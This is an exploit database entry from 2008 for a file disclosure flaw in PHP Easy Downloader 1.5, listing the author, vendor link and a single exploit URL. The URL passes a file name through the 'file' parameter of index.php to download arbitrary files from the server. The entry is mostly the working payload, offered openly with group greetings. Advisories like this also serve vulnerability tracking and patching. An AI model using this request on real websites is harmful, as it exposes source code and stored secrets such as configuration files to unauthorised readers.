PHP Easy Downloader 1.5 - 'file' File Disclosure

EDB-ID:

6770

CVE:

N/A

Author:

LMaster

Type:

webapps

Platform:

PHP

Published:

2008-10-16

::::::::::::::::::::R3AL.RU::::::::::::::::::::

PHP Easy Downloader <= 1.5 Remote File Download

Author: LMaster

Greetz: Pogozheva Irina Borisovna and r3al.ru

Download:

http://www.hasemithut.de/downloads/index.php

Exploit:

http://www.target.com/phpeasydownloader/index.php?file=index.php

# milw0rm.com [2008-10-16]